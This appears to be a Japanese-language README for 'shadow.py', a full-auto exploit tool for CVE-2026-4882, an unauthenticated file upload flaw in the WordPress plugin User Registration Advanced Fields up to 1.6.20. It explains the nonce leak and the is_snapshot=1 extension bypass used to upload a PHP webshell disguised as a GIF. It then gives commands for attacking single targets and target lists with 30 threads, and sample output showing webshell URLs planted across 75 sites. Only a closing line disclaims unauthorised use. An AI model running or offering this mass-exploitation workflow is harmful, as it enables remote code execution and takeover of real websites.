
User Registration Advanced Fields <= 1.6.20 - 未認証の任意ファイルアップロード
User Registration Advanced Fields <= 1.6.20 - 認証なし任意ファイルアップロード
User Registration Advanced Fields <= 1.6.20 - 認証なし任意ファイルアップロード
WordPress用プラグイン「User Registration Advanced Fields」(バージョン1.6.20以下) は、AJAXアクション uraf_profile_picture_upload_method_upload を介した認証なし任意ファイルアップロードに対して脆弱です。このプラグインは、登録フォームを含むすべてのページで wp_localize_script() を通じて有効なnonceを漏洩し、is_snapshot=1 パラメータを使用するとファイル拡張子の検証を完全にバイパスします。これにより、認証されていない攻撃者が任意のファイル(例:GIF画像に偽装したPHPウェブシェル)をアップロードできるようになり、ファイルは wp-content/uploads/user_registration_uploads/temp-uploads/ に保存され、完全なリモートコード実行(RCE)につながります。
~ CVSSスコア: 9.8 (緊急)
~ 影響を受けるバージョン: <= 1.6.20
単一ターゲット :
python3 shadow.py -u https://target.com -s shadow.php複数ターゲット :
python3 shadow.py -f targets.txt -s shadow.php -t 30対話モード :
python3 shadow.py
╔══════════════════════════════════════════════════╗
║ CVE-2026-4882 — Full Auto Exploit ║
║ User Registration Advanced Fields <= 1.6.20 ║
║ by: Shadow x Friska 😈🔥 ║
╚══════════════════════════════════════════════════╝
═══ Interactive Mode ═══
📄 Target file (e.g. targets.txt): list.txt
⚡ Threads 1-50 (default 30): 30
🎯 Targets : 75
📁 Shell : shadow.php
⚡ Threads : 30
💣 Brute : 1-500
🩷 [3/75] http://target.com
→ http://target.com/wp-content/uploads/user_registration_uploads/temp-uploads/shadow.php
💀 [1/75] http://example.com — no nonce
❌ [4/75] http://example2.com — upload failed
自分が所有していない、またはテストする許可がないシステムへの不正使用は違法です。